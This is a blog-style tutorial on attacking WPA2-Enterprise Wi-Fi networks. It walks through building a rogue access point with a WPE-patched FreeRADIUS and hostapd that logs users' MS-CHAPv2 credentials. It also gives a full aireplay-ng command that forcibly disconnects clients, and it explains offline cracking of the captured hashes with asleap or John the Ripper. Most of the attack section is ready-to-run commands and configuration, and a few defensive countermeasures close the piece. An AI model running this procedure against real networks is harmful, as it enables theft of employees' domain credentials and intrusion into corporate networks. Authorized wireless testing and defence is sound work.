Attacking WPA2 enterprise
In this article we will learn about Attacking WPA2 enterprise.
Introduction to Attacking WPA2 enterprise:
The widespread use of mobile and portable devices in the enterprise environment requires the proper implementation of a wireless network infrastructure to provide them with connectivity and ensure business functionality.
WPA-Enterprise is ideal for corporations: it does not use a single PSK in which all users connect to the wireless network, but each user has their own credentials that they use to authenticate to the network. This allows for flexibility and centralized management of domain accounts.
Wireless communications can contain a lot of sensitive information that, if an unauthorized user were able to intercept or connect to a wireless access point, could be obtained and subsequently compromise the confidentiality, integrity and availability of an organization’s data.
Background
The WPA-Enterprise standard, also known as WPA-802.1X, is designed for enterprise wireless networks using supplicants, authenticators, and an authentication server. A supplicant is a client device that is responsible for sending requests to the WLAN and providing credentials to the authenticator. An authenticator is typically an enterprise access point that interfaces with an authentication server, implemented via RADIUS or IAS, to authenticate and authenticate the user client.
This technology relies on the Extensible Authentication Protocol (EAP) to send messages between the supplicant and the authentication server, allowing businesses to encapsulate packets using several implementations: EAP-TLS, EAP-TTLS/MSCHAPv2, PEAP/EAP-MSCHAPv2, PEAP/ EAP-GTC , PEAP-TLS, EAP-SIM, EAP-AKA, EAP-FAST and LEAP.
This article will focus on deploying EAP-TTLS (with Tunneled Transport Layer Security) and PEAP (Protected EAP); these implementations are the most widely used in enterprise Wi-Fi today because they are considered very resistant to attack. Although technically different, they work similarly and provide security through a TLS tunnel to ensure that credentials cannot be retrieved, unlike other EAP configurations.
WPA2 enterprise attack
The methodological approach used consists of the first step of preparing the network infrastructure, followed by the enumeration of wireless devices and finally the phase of attacking the connected clients in order to obtain credentials.
The attack consists of spoofing the target network and providing a better signal to the client than the legitimate access point in order to perform a Man-In-The-Middle attack between the clients and the network infrastructure, as currently the TLS tunnel is secure enough and not easily hacked. To carry out this type of attack, you need to be physically close to the target, especially staying within the operational range of the enterprise access point.
In a typical attack, there is also a reconnaissance phase with the aim of identifying all access points, clients and obtaining as much information as possible about the target, especially technologies and implementations. However, this information, especially the EAP type, can be identified by inspecting the EAP handshake with a sniffer (eg Wireshark).
Building infrastructure
The first thing to do before launching an attack is to create an infrastructure to replicate the enterprise wireless environment that should match the target as closely as possible. This provisioning step is used to simulate the real network and force clients to connect to the real infrastructure. As mentioned above, the basic components needed are a RADIUS server and an access point.
Also Read:Everything you need to know about Ethical Hacking as a Career by Blackhat Pakistan 2023
As for the RADIUS server, we will be using FreeRADIUS v2.1.12, one of the most popular open source RADIUS servers, with the Wireless Pwnage Edition patch. This patch is used to log the request made, which contains the authentication credentials (challenge/response, username and password).
To install it in a Debian-based environment, you can run the following commands:
$ wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
$ wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
$ tar -jxvf freeradius-server-2.1.12.tar.bz2
$ cd freeradius-server-2.1.12
$ patch -p1 < ../freeradius-wpe.patch
$ ./configure
$ make && make install
$ldconfig
Then you edit the configuration files to customize our implementation:
/usr/local/etc/raddb/radiusd.conf
ipaddr = 127.0.0.1 # RADIUS IP address
default_eap_type = peap # Configure EAP type to PEAP
/usr/local/etc/raddb/clients.conf
client 192.168.0.0/16 { # IP range and credentials for our clients
secret = testing123 # RADIUS secret
shortname = testAP # RADIUS shortname}
In a scenario where clients check the validity of a certificate, you must purchase and deploy a valid certificate to the RADIUS server. This issue is not covered in this article.
Now we start the radius server with the following command:
$ radiusd -X // -X parameter for degubbing mode
We will use Hostapd v2.3 with the implementation of “Jouni Malinen”, a user-space daemon for wireless access points and authentication servers that can support the IEEE 802.11x standard and connect to a RADIUS server, to simulate an access point for the victim to connect to our authentication server.
To install it in a Debian-based environment, you can run the following commands:
$ apt-get install libnl-dev libssl-dev // Dependencies
$ wget http://hostap.epitest.fi/releases/hostapd-2.3.tar.gz
$ tar -zxvf hostapd-2.3.tar.gz
$ cd hostapd-2.3/hostapd/
$ cp defconfig .config
$ make && make install
Hostapd requires a hostapd.conf configuration file to run, which in this scenario might be the following:
interface=wlan1 # Interface used for access point
driver=nl80211 # Driver interface type
ssid=EnterpriseWireless # SSID of the wireless network
logger_stdout=-1 # Levels of event logs
logger_stdout_level=0
ieee8021x=1 # Set IEEE 802.1x authorization
eapol_key_index_workaround=0 # Workaround for WinXP Supplicant
own_ip_addr=127.0.0.1 # Access point’s own IP address
auth_server_addr=127.0.0.1 # RADIUS IP address
auth_server_port=1812 # RADIUS port
auth_server_shared_secret=testing123 # RADIUS secret
wpa=2 # Configure WPA
wpa_key_mgmt=WPA-EAP # Key management algorithm
channel=1 # Channel used
wpa_pairwise=TKIP CCMP # Pairwise cipher for WPA
Now we can start the fake access point with the following command:
$ hostapd ./hostapd.conf
Enumeration and deauthentication of clients
After the preparation phase is complete, we need to enumerate and deauthenticate the clients connected to the target network to connect to our fake infrastructure. We can perform these tasks using Aircrack-NG, the most popular 802.11 wireless LAN evaluation software suite.
Use this command to enumerate the wireless networks with the client connected:
$ airodump-ng mon0 // mon0 = wireless interface in promiscuous mode
After a few minutes you will have a complete mapping of all wireless networks and clients identified in the area. At this point, we need to identify the client connected to the target infrastructure and de-authenticate it using the following command:
$ aireplay-ng –deauth 1 -a 00:01:E3:AD:F2:27 -c 00:27:19:CD:D5:4A mon0
// –deauth = deauthentication attack
// -a = MAC address of the access point
// -c = client MAC address
Alternatively, you can expect the client to connect to our own infrastructure, but this can lead to a very long wait, which often does not happen.
Capture and crack credentials
After a few minutes, if we have a better signal, the client will connect to our infrastructure and provide your credentials encrypted with MS-CHAPv2, in the form of a challenge and response, which will be stored on freeradius-server-wpe. log file.
The final step is to retrieve the credentials in clear text from the authentication exchange. We will use the Asleap tool for this activity, with which we can perform an offline dictionary-based attack. Alternatively, you can use John the Ripper by entering the NETNTLM format.
If our word list contains a password, we will be able to identify it as in this case. In fact, as can be deduced, it is very important to have a good list of keywords to ensure that the attack is successful.
Wireless hardware
Of particular note is the hardware used to support these activities. I have personally tested and successfully worked the following network devices:
- Alpha USB Long Range Adapter with Atheros Chipset
- TP-Link High Gain Wireless USB Adapter with Atheros Chipset
- Router Asus RT-AC66U
- D-Link DIR-601
Conclusion
This article described a possible attack on a WPA2-Enterprise network for which there is no single mitigation. You can use defense-in-depth to secure EAP-TTLS and PEAP against these types of attacks. The first countermeasure is to force the client to verify the certificate and prevent these client devices from connecting to the network when the verification fails.
Second, it is recommended not to use domain credentials, but if necessary, it should use a strong password policy for keywords that are complex and difficult to guess through a dictionary-based attack.
Finally, it should constantly monitor the reach of your wireless network, such as with a wireless IDS, and be ready to respond quickly to spoofed or rogue access points. In addition, it should isolate the wireless network from the internal network.
Sources
- Wikipedia
- Security synapse
- Open security research
- Security how to WPA2 Enterprise in your home network
- Hacking Exposed Wireless, 3rd Edition Wireless Security Secret & Solutions
